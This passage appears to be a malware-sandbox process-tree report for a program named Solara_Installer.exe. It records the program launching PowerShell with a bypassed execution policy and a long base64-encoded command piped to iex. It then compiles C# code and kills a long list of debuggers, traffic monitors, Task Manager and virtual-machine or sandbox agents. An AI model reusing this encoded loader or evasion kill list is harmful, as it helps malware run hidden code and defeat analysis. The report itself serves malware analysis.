  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6836 /prefetch:1
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:1
  2⤵
  PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7920 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
  2⤵
  PID:2424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
  2⤵
  PID:2536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:1
  2⤵
  PID:2416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:1
  2⤵
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=8468 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3176

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:224

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\SolaraInstaller\" -ad -an -ai#7zMap7726:92:7zEvent29306
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5108

C:\Users\Admin\Downloads\SolaraInstaller\Solara_Installer.exe
"C:\Users\Admin\Downloads\SolaraInstaller\Solara_Installer.exe"
1⤵
- Executes dropped EXE
PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA"
  2⤵
  PID:3660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4a0j20jz\4a0j20jz.cmdline"
      4⤵
      PID:5360
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3857.tmp" "c:\Users\Admin\AppData\Local\Temp\4a0j20jz\CSC28BBCBA98CC54F96B234CFEC0EB4CF8.TMP"
        5⤵
        
        PID:5444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM httpdebuggerui.exe /F"
  2⤵
  PID:2516
- - C:\Windows\system32\taskkill.exe
    taskkill /IM httpdebuggerui.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM wireshark.exe /F"
  2⤵
  PID:5160
- - C:\Windows\system32\taskkill.exe
    taskkill /IM wireshark.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM fiddler.exe /F"
  2⤵
  PID:5212
- - C:\Windows\system32\taskkill.exe
    taskkill /IM fiddler.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM regedit.exe /F"
  2⤵
  PID:5260
- - C:\Windows\system32\taskkill.exe
    taskkill /IM regedit.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM cmd.exe /F"
  2⤵
  PID:5308
- - C:\Windows\system32\taskkill.exe
    taskkill /IM cmd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM taskmgr.exe /F"
  2⤵
  PID:5384
- - C:\Windows\system32\taskkill.exe
    taskkill /IM taskmgr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vboxservice.exe /F"
  2⤵
  PID:5492
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vboxservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM df5serv.exe /F"
  2⤵
  PID:5540
- - C:\Windows\system32\taskkill.exe
    taskkill /IM df5serv.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM processhacker.exe /F"
  2⤵
  PID:5600
- - C:\Windows\system32\taskkill.exe
    taskkill /IM processhacker.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vboxtray.exe /F"
  2⤵
  PID:5648
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vboxtray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmtoolsd.exe /F"
  2⤵
  PID:5692
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmtoolsd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmwaretray.exe /F"
  2⤵
  PID:5736
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmwaretray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM ida64.exe /F"
  2⤵
  PID:5780
- - C:\Windows\system32\taskkill.exe
    taskkill /IM ida64.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM ollydbg.exe /F"
  2⤵
  PID:5824
- - C:\Windows\system32\taskkill.exe
    taskkill /IM ollydbg.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM pestudio.exe /F"
  2⤵
  PID:5868
- - C:\Windows\system32\taskkill.exe
    taskkill /IM pestudio.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmwareuser.exe /F"
  2⤵
  PID:5912
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmwareuser.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vgauthservice.exe /F"
  2⤵
  PID:5956
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vgauthservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmacthlp.exe /F"
  2⤵
  PID:6000
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmacthlp.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM x96dbg.exe /F"
  2⤵
  PID:6044
- - C:\Windows\system32\taskkill.exe
    taskkill /IM x96dbg.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmsrvc.exe /F"
  2⤵
  PID:6088
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmsrvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM x32dbg.exe /F"
  2⤵
  PID:6132
- - C:\Windows\system32\taskkill.exe
    taskkill /IM x32dbg.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmusrvc.exe /F"
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmusrvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM prl_cc.exe /F"
  2⤵
  PID:5164
- - C:\Windows\system32\taskkill.exe
    taskkill /IM prl_cc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM prl_tools.exe /F"
  2⤵
  PID:5220
- - C:\Windows\system32\taskkill.exe
    taskkill /IM prl_tools.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM xenservice.exe /F"
  2⤵
  PID:5268
- - C:\Windows\system32\taskkill.exe
    taskkill /IM xenservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM qemu-ga.exe /F"
  2⤵
  PID:5308
- - C:\Windows\system32\taskkill.exe
    taskkill /IM qemu-ga.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM joeboxcontrol.exe /F"
  2⤵
  PID:5436
- - C:\Windows\system32\taskkill.exe
    taskkill /IM joeboxcontrol.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM ksdumperclient.exe /F"
  2⤵
  PID:4928
- - C:\Windows\system32\taskkill.exe
    taskkill /IM ksdumperclient.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM ksdumper.exe /F"
  2⤵
  PID:5488
- - C:\Windows\system32\taskkill.exe
    taskkill /IM ksdumper.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM joeboxserver.exe /F"
  2⤵
  PID:5516
- - C:\Windows\system32\taskkill.exe
    taskkill /IM joeboxserver.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5508
- C:\Windows\system32\cmd.exe
